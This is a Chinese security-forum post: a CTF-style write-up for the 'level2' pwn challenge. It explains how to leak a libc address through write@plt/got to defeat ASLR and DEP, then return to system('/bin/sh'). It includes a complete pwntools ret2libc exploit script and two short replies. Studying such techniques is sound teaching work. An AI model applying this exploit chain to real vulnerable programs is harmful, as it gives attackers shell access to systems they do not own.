[原创]蒸米ROP基础pwn-Level2通过 ROP 绕过 DEP 和 ASLR 防护-Pwn-看雪-安全社区|安全招聘|kanxue.com

[原创]蒸米ROP基础pwn-Level2通过 ROP 绕过 DEP 和 ASLR 防护

2024-4-29 17:18 1606

[原创]蒸米ROP基础pwn-Level2通过 ROP 绕过 DEP 和 ASLR 防护

wx_一个很好记得名字活跃值

2024-4-29 17:18

1606

Pwn题下载
看雪幸运轮盘一点也不幸运我的看雪币都没了！！！

1.环境

ubuntu1~16.04.12
pwndbg
python

2.目标

学会绕过DEP、ASLR 的技巧。

3.流程

还是level2这个程序，开启了RELRO 防护，栈溢出的我就不写了上个文章已经写了。
开启RELRO 防护

1 2	`sudo` `-s` `echo` `2` `>` `/proc/sys/kernel/randomize_va_space`

上一个程序关闭了RELRO才能计算到基地址，现在开启了RELRO防护如何计算RELRO 地址？

可以通过计算当前执行的内存地址进行攻击，也就是RELRO每次启动都会变更内存地址，我们可以通过python每次启动的时候都去计算他的地址得到system地址。

4.解题

根据延迟绑定机制进行解题
got的地址是真实的地址（后三位），可以通过plt去调用已经执行过的函数从从而获取到当前内存的相对地址。可以通过使用plt函数地址减去got函数地址得到libc的地址公式可以看上一篇文章。

重点：注意要跳回来 vulnerable_function_addr这个函数为第二栈溢出做准备。

1	`payload` `=` `b'a'*140` `+` `p32(write_plt)` `+` `p32(vulnerable_function_addr)` `+` `p32(0x1)` `+` `p32(write_got)` `+` `p32(0x4)`

使用write_plt（是write为了区分）函数输出 write 的内存地址因为调用write_plt后got会被绑定成功输出的时候是got绑定后的真实地址。

1	`write_got_addr` `=` `u32(p.recv(4))# 保存输出的地址`

使用libc.symbols['write']（plt）地址减去 write_got_addr（got）地址得到libc地址……以此类推就得到了内存地址

libc_addr = write_got_addr-libc.symbols['write'] 
system_addr = libc_addr+libc.symbols['system']
str_bin_sh = libc_addr + next(libc.search('/bin/sh'))

5.Exp

from pwn import *
 
p = process("./level2")
 
# File Elf 
elf = ELF('./level2')
libc = ELF('./libc.so.6')
write_plt = elf.symbols['write'] # plt 
write_got = elf.got['write']
vulnerable_function_addr = elf.symbols['vulnerable_function']
 
# POC 
if args.G:
    gdb.attach(p, "b *vulnerable_function\r\n")
payload = b'a'*140 + p32(write_plt) + p32(vulnerable_function_addr) + p32(0x1) + p32(write_got) + p32(0x4)
 
p.send(payload)
write_got_addr = u32(p.recv(4))
# libc  
libc_addr = write_got_addr-libc.symbols['write'] 
system_addr = libc_addr+libc.symbols['system']
str_bin_sh = libc_addr + next(libc.search('/bin/sh'))
 
print("String_binsh_addr:", hex(str_bin_sh))
print("system_addr:", hex(system_addr))
 
# POC 2 
payload = b'a'*140 + p32(system_addr) + p32(0x0) + p32(str_bin_sh)
 
p.send(payload)
 
p.interactive()

[培训]《安卓高级研修班(网课)》月薪三万计划，掌握调试、分析还原ollvm、vmp的方法，定制art虚拟机自动化脱壳的方法

最后于 2024-4-29 17:27 被wx_一个很好记得名字编辑，原因：缺东西

#题解集锦 #溢出 #漏洞机制 #基础知识

收藏・1

点赞・0

打赏

最新回复 (2)
秋狝雪币： 19759 活跃值： (29377) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 1600 粉丝 31 关注私信	秋狝 2024-4-30 22:48 2 楼 1 感谢分享
Editor 雪币： 18869 活跃值： (60323) 能力值： (RANK：125 ) 在线值：发帖 1224 回帖 2886 粉丝 1517 关注私信	Editor 2024-5-1 09:08 3 楼 0 文章写的简单了些，再补充些细节？
	游客登录 \| 注册方可回帖　回帖　表情雪币赚取及消费高级回复